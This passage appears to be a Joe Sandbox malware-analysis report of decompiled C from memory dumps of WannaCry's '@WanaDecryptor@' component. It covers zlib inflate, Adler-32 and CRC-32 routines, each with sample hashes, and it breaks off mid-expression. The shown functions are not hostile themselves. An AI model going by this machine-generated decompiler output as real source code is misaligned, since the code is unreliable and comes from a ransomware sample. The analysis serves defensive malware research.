                                  							while((_t173 & 0x00000040) == 0) {
                                  								_t267 = ( *(0x41a260 + _t173 * 4) & _t270) +  *((intOrPtr*)(_t286 + 4));
                                  								_t173 =  *((intOrPtr*)(_t286 + _t267 * 8));
                                  								_t286 = _t286 + _t267 * 8;
                                  								if(0 == 0) {
                                  									goto L35;
                                  								} else {
                                  									_t270 = _t270 >>  *(_t286 + 1);
                                  									_t155 = _t155;
                                  									 *(_t331 + 0x28) = 0;
                                  									if((_t173 & 0x00000010) == 0) {
                                  										continue;
                                  									} else {
                                  										goto L12;
                                  									}
                                  								}
                                  								goto L51;
                                  							}
                                  							if((_t173 & 0x00000020) == 0) {
                                  								_t249 =  *((intOrPtr*)(_t331 + 0x3c));
                                  								 *(_t249 + 0x18) = "invalid literal/length code";
                                  								 *(_t331 + 0x2c) =  *((intOrPtr*)(_t249 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
                                  								_t305 = _t155 >> 3;
                                  								if(_t305 >=  *(_t331 + 0x2c)) {
                                  									L49:
                                  									_t305 =  *(_t331 + 0x2c);
                                  								}
                                  								L50:
                                  								_t193 =  *((intOrPtr*)(_t331 + 0x38));
                                  								_t325 = _t316 - _t305;
                                  								 *(_t193 + 0x20) = _t270;
                                  								 *((intOrPtr*)(_t193 + 0x1c)) = _t155 - _t305 * 8;
                                  								 *((intOrPtr*)(_t249 + 4)) = _t305 +  *((intOrPtr*)(_t331 + 0x10));
                                  								 *_t249 = _t325;
                                  								 *((intOrPtr*)(_t249 + 8)) =  *((intOrPtr*)(_t249 + 8)) + _t325 -  *_t249;
                                  								 *((intOrPtr*)(_t193 + 0x34)) = _t281;
                                  								return 0xfffffffd;
                                  							} else {
                                  								_t313 =  *((intOrPtr*)(_t331 + 0x3c));
                                  								_t261 =  *((intOrPtr*)(_t313 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
                                  								_t200 = _t155 >> 3;
                                  								if(_t200 < _t261) {
                                  									_t261 = _t200;
                                  								}
                                  								_t201 =  *((intOrPtr*)(_t331 + 0x38));
                                  								_t326 = _t316 - _t261;
                                  								 *(_t201 + 0x20) = _t270;
                                  								 *((intOrPtr*)(_t201 + 0x1c)) = _t155 - _t261 * 8;
                                  								 *((intOrPtr*)(_t313 + 4)) = _t261 +  *((intOrPtr*)(_t331 + 0x10));
                                  								 *_t313 = _t326;
                                  								 *((intOrPtr*)(_t313 + 8)) =  *((intOrPtr*)(_t313 + 8)) + _t326 -  *_t313;
                                  								 *((intOrPtr*)(_t201 + 0x34)) = _t281;
                                  								return 1;
                                  							}
                                  						}
                                  					}
                                  					L51:
                                  				}
                                  			}

                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d6486e9592c2cb46b2c7999eca97cef0babd6418c513dfe1291d56d14bfb9792
                                  • Instruction ID: 2ca3a7e0973b0a9ded1865a7ec8cc067e044c270efaf411a13bb96b1b7e56096
                                  • Opcode Fuzzy Hash: d6486e9592c2cb46b2c7999eca97cef0babd6418c513dfe1291d56d14bfb9792
                                  • Instruction Fuzzy Hash: DDD1B73560C3418FC718CF2CD59016ABBE1EB99310F19497EE9DAA3756C734E819CB89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00410180() {
                                  				unsigned int _t28;
                                  				unsigned int _t35;
                                  				signed int _t38;
                                  				signed int _t40;
                                  				signed int _t41;
                                  				signed int _t42;
                                  				signed int _t43;
                                  				signed int _t44;
                                  				signed int _t45;
                                  				signed int _t46;
                                  				signed int _t47;
                                  				signed int _t48;
                                  				signed int _t49;
                                  				signed int _t50;
                                  				signed int _t51;
                                  				signed int _t52;
                                  				signed int _t53;
                                  				signed int _t54;
                                  				unsigned int _t96;
                                  				signed int _t97;
                                  				unsigned int _t114;
                                  				signed int _t117;
                                  				void* _t119;
                                  
                                  				_t114 =  *(_t119 + 0xc);
                                  				_t96 =  *(_t119 + 0xc);
                                  				_t38 = _t96 & 0x0000ffff;
                                  				_t97 = _t96 >> 0x10;
                                  				if(_t114 != 0) {
                                  					_t35 =  *(_t119 + 0x18);
                                  					if(_t35 > 0) {
                                  						do {
                                  							_t28 = _t35;
                                  							if(_t35 >= 0x15b0) {
                                  								_t28 = 0x15b0;
                                  							}
                                  							_t35 = _t35 - _t28;
                                  							if(_t28 >= 0x10) {
                                  								_t117 = _t28 >> 4;
                                  								_t28 = _t28 + ( ~_t117 << 4);
                                  								do {
                                  									_t114 = _t114 + 0x10;
                                  									_t40 = _t38;
                                  									_t41 = _t40;
                                  									_t42 = _t41;
                                  									_t43 = _t42;
                                  									_t44 = _t43;
                                  									_t45 = _t44;
                                  									_t46 = _t45;
                                  									_t47 = _t46;
                                  									_t48 = _t47;
                                  									_t49 = _t48;
                                  									_t50 = _t49;
                                  									_t51 = _t50;
                                  									_t52 = _t51;
                                  									_t53 = _t52;
                                  									_t54 = _t53;
                                  									_t38 = _t54;
                                  									_t97 = _t97 + _t40 + _t41 + _t42 + _t43 + _t44 + _t45 + _t46 + _t47 + _t48 + _t49 + _t50 + _t51 + _t52 + _t53 + _t54 + _t38;
                                  									_t117 = _t117 - 1;
                                  								} while (_t117 != 0);
                                  							}
                                  							if(_t28 != 0) {
                                  								do {
                                  									_t38 = _t38;
                                  									_t114 = _t114 + 1;
                                  									_t97 = _t97 + _t38;
                                  									_t28 = _t28 - 1;
                                  								} while (_t28 != 0);
                                  							}
                                  							_t38 = _t38 % 0xfff1;
                                  							_t97 = _t97 % 0xfff1;
                                  						} while (_t35 > 0);
                                  					}
                                  					return _t97 << 0x00000010 | _t38;
                                  				} else {
                                  					return 1;
                                  				}
                                  			}



























                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
                                  • Instruction ID: 6bb151cab00cdc0290d3db98aa961ff277c67549bb944e7b7c7e1e2eea59e94c
                                  • Opcode Fuzzy Hash: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
                                  • Instruction Fuzzy Hash: A1314D3374558203F71DCA2F8CA12FAEAD34FD522872DD57E99C987356ECFA48564104
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040FF90(signed int _a4, intOrPtr _a8, unsigned int _a12) {
                                  				signed int _t29;
                                  				intOrPtr _t76;
                                  				unsigned int _t115;
                                  				unsigned int _t118;
                                  
                                  				_t76 = _a8;
                                  				if(_t76 != 0) {
                                  					_t118 = _a12;
                                  					_t29 =  !_a4;
                                  					if(_t118 >= 8) {
                                  						_t115 = _t118 >> 3;
                                  						do {
                                  							_t118 = _t118 - 8;
                                  							_t29 = ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) 
^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c 
+ (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 
0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008 ^  *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 
0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 
4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 
0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) 
